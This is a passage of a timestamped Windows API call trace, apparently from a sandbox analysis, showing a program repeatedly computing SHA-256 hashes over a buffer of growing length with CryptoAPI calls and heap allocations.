	[0118.970] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.970] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.970] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.970] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0118.970] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fccc0
	[0118.970] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fccc0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fccc0, pdwDataLen=0x12942c) returned 1
	[0118.970] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.970] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.970] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.971] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.971] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0118.971] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcce8
	[0118.971] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcce8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcce8, pdwDataLen=0x12942c) returned 1
	[0118.971] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.971] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.971] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.972] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.972] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0118.972] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcd10
	[0118.972] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcd10, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcd10, pdwDataLen=0x12942c) returned 1
	[0118.972] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.972] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.972] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.972] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.972] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0118.972] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcd38
	[0118.973] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcd38, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcd38, pdwDataLen=0x12942c) returned 1
	[0118.973] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.973] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.973] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.973] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.973] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0118.973] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcd60
	[0118.973] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcd60, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcd60, pdwDataLen=0x12942c) returned 1
	[0118.974] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.974] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.974] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.976] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.976] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0118.976] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcd88
	[0118.976] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcd88, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcd88, pdwDataLen=0x12942c) returned 1
	[0118.976] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.976] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.976] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.977] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.977] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0118.977] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcdb0
	[0118.977] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcdb0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcdb0, pdwDataLen=0x12942c) returned 1
	[0118.977] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.977] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.977] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.978] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.978] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0118.978] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcdd8
	[0118.978] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcdd8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcdd8, pdwDataLen=0x12942c) returned 1
	[0118.978] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.978] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.978] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.979] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.979] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0118.979] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fce00
	[0118.979] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fce00, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fce00, pdwDataLen=0x12942c) returned 1
	[0118.979] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.979] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.979] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.980] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.980] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0118.980] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fce28
	[0118.980] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fce28, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fce28, pdwDataLen=0x12942c) returned 1
	[0118.980] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.980] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.980] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.980] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.980] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0118.980] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fce50
	[0118.980] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fce50, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fce50, pdwDataLen=0x12942c) returned 1
	[0118.981] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.981] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.981] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.981] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.981] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0118.981] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fce78
	[0118.981] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fce78, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fce78, pdwDataLen=0x12942c) returned 1
	[0118.981] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.981] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.981] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.982] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.982] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0118.982] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcea0
	[0118.982] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcea0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcea0, pdwDataLen=0x12942c) returned 1
	[0118.982] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.982] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.982] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.983] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.983] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0118.983] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcec8
	[0118.983] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcec8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcec8, pdwDataLen=0x12942c) returned 1
	[0118.983] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.983] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.983] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.984] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.984] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0118.984] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcef0
	[0118.984] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcef0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcef0, pdwDataLen=0x12942c) returned 1
	[0118.984] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.984] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.984] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.985] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.985] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0118.985] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcf18
	[0118.985] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcf18, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcf18, pdwDataLen=0x12942c) returned 1
	[0118.985] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.985] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.985] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.985] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.985] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0118.986] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcf40
	[0118.986] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcf40, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcf40, pdwDataLen=0x12942c) returned 1
	[0118.986] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.986] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.986] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.986] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.986] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0118.986] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcf68
	[0118.986] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcf68, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcf68, pdwDataLen=0x12942c) returned 1
	[0118.986] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.986] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.986] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.987] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.987] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0118.987] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcf90
	[0118.987] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcf90, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcf90, pdwDataLen=0x12942c) returned 1
	[0118.987] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.987] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.987] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.987] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.987] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0118.987] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcfb8
	[0118.987] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcfb8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcfb8, pdwDataLen=0x12942c) returned 1
	[0118.987] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.988] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.988] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.988] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.988] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0118.988] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd000
	[0118.988] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd000, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd000, pdwDataLen=0x12942c) returned 1
	[0118.988] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.988] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.988] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.988] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.988] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0118.988] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd028
	[0118.988] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd028, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd028, pdwDataLen=0x12942c) returned 1
	[0118.988] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.988] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.989] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.989] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.989] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0118.989] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd050
	[0118.989] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd050, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd050, pdwDataLen=0x12942c) returned 1
	[0118.989] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.989] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.989] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.989] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.989] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0118.989] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd078
	[0118.989] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd078, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd078, pdwDataLen=0x12942c) returned 1
	[0118.989] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.989] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.990] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.990] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.990] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0118.990] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd0a0
	[0118.990] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd0a0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd0a0, pdwDataLen=0x12942c) returned 1
	[0118.990] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.990] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.990] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.990] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.990] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0118.990] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd0c8
